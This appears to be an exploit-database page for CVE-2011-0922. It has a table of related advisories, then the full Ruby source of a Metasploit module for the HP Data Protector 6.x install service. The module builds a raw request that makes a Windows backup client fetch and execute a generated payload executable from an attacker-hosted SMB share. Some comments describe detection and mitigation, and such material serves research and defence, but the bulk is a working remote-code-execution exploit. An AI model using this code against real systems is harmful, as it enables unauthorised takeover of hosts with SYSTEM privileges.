| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| | HP Data Protector Client EXEC_SETUP Code Execution PoC (ZDI-11-056) | 29 May 2011 00:00 | – | zdt |
| | HP Data Protector Client EXEC_CMD Remote Code Execution | 19 Jun 2012 00:00 | – | zdt |
| | HP Data Protector CMD Install Service Vulnerability (msf) | 3 Aug 2013 00:00 | – | zdt |
| | CVE-2011-0922 | 29 May 2011 00:00 | – | circl |
| | HP Data Protector Backup Client Service EXEC_SETUP Code Execution (CVE-2011-0922) | 15 May 2011 00:00 | – | checkpoint_advisories |
| | HP Data Protector Backup Client Service Code Execution - Ver2 (CVE-2011-0922) | 5 Jul 2018 00:00 | – | checkpoint_advisories |
| | CVE-2011-0922 | 9 Feb 2011 00:00 | – | cve |
| | CVE-2011-0922 | 9 Feb 2011 00:00 | – | cvelist |
| | HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution | 29 May 2011 00:00 | – | exploitdb |
| | HP Data Protector Client - EXEC_CMD Remote Code Execution | 19 Jun 2012 00:00 | – | exploitdb |
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
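# Metasploit module for the HP Data Protector Omniinet "install service"
# request (CVE-2011-0922, per the References entry below).
#
# What this file shows, read from a defender's side:
#   * one TCP request is sent to RPORT (default 5555);
#   * the request's 16-bit text fields spell out "SYSTEM", "NT AUTHORITY",
#     "ADD/UPGRADE" and a UNC path \\<SRVHOST>\Omniback\i386\installservice.exe;
#   * the executable is served from an SMB share hosted by the framework
#     (Msf::Exploit::Remote::SMB::Server::Share).
# So the observable pattern is an inbound connection to the Data Protector
# client port carrying a UNC path, followed by an outbound SMB fetch of
# installservice.exe from that same host. Limiting which hosts may reach the
# client port and which SMB servers a backup client may reach narrows both
# halves; the vendor advisory in References is the authority on fixed builds.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  # Registers module metadata and options.
  #
  # Adds RPORT (5555) and SMB_DELAY, and removes the share-related options
  # (FOLDER_NAME, FILE_CONTENTS, SHARE, FILE_NAME) because #primer assigns the
  # share name, file name and file contents itself.
  #
  # @param info [Hash] metadata merged into this module's defaults
  def initialize(info={})
    super(update_info(info,
      'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service',
      'Description' => %q{
This module exploits HP Data Protector Omniinet process on Windows only.
This exploit invokes the install service function which allows an attacker to create a
custom payload in the format of an executable.
To ensure this works, the SMB server created in MSF must have a share called Omniback
which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\
},
      'Author' => [
        'Ben Turner',
      ],
      'References' =>
        [
          ['CVE', '2011-0922'],
          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload' =>
        {
          'Space' => 2048,
          'DisableNops' => true
        },
      'Privileged' => true,
      'Platform' => 'win',
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'Targets' =>
        [
          [ 'HP Data Protector 6.10/6.11/6.20 / Windows', { } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Nov 02 2011'))
    register_options(
      [
        Opt::RPORT(5555),
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)
    deregister_options('FOLDER_NAME')
    deregister_options('FILE_CONTENTS')
    deregister_options('SHARE')
    deregister_options('FILE_NAME')
  end

  # @return [String] "host:port" label used in status output
  def peer
    "#{rhost}:#{rport}"
  end

  # Classifies the target from its banner alone.
  #
  # Caveat for anyone using this as an exposure check: the pattern accepts any
  # "HP Data Protector A.06.<digits>" banner and the captured digits are never
  # compared, so Appears is returned for every 6.x build whether or not it has
  # been fixed, and Safe only means the banner did not match. Confirm the
  # installed build against the vendor advisory before relying on the result.
  #
  # @return [Exploit::CheckCode] Unknown when nothing was received, Appears on
  #   a banner match, Safe otherwise
  def check
    fingerprint = get_fingerprint

    if fingerprint.nil?
      vprint_status('Unable to fingerprint because no response.')
      return Exploit::CheckCode::Unknown
    end

    vprint_status("#{peer} - #{fingerprint}")

    # Both branches used to return explicitly, which left a trailing
    # CheckCode::Detected statement unreachable; it has been removed.
    if fingerprint =~ /HP Data Protector A\.06\.(\d+)/i
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Sends 64 random uppercase letters and returns whatever the service
  # answers, converted to ASCII with the trailing characters trimmed.
  #
  # The socket is released in an ensure clause so that an error while writing
  # or reading does not leave the connection open.
  #
  # @return [String, nil] the banner text, or nil when nothing was received
  def get_fingerprint
    ommni = connect
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1)
    return nil if resp.nil?

    # Delete unicode last null
    Rex::Text.to_ascii(resp).chop.chomp
  ensure
    disconnect
  end

  # Prepares the hosted file and sends the single install-service request.
  #
  # The request bytes are kept exactly as published. SRVHOST is inserted six
  # times; every occurrence sits inside a UNC path, which is what makes the
  # receiving host reach back to that address over SMB.
  def primer
    # File and share names are fixed, matching the path embedded in the request.
    self.file_contents = generate_payload_exe
    self.file_name = "installservice.exe"
    self.share = "Omniback\\i386"
    print_status("File available on #{unc}...")
    vprint_status("#{peer} - Trying to execute remote EXE...")
    lhost = "#{datastore['SRVHOST']}"
    # Each character of the address is prefixed with a NUL byte so it lines up
    # with the 16-bit text around it.
    lhostfull = ""
    lhost.each_char do |character|
      lhostfull = lhostfull << "\x00" << character
    end
    packet = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
    packet << lhostfull
    packet << "\x00\x00\x00\x20\x00\x30\x00"
    packet << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
    packet << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
    packet << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
    packet << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
    packet << "\x5c"
    packet << lhostfull
    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
    packet << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
    packet << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
    packet << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
    packet << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
    packet << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
    packet << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
    packet << lhostfull
    packet << "\x5c\x00\x5c\x00\x4f\x00"
    packet << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
    packet << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
    packet << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
    packet << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
    packet << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
    packet << "\x5c\x00\x5c"
    packet << lhostfull
    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
    packet << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
    packet << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
    packet << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
    packet << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
    packet << lhostfull
    packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
    packet << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
    connect
    sock.put(packet)
    disconnect
  end

  # Runs the inherited exploit routine for at most SMB_DELAY seconds.
  #
  # Timeout::Error is swallowed on purpose: reaching the deadline is how the
  # run normally ends (the original comment reads "Stop SMB Server").
  # NOTE(review): super is presumably the share-serving loop from the SMB
  # Share mixin - confirm against the framework source.
  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # Stop SMB Server
    end
  end
end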
`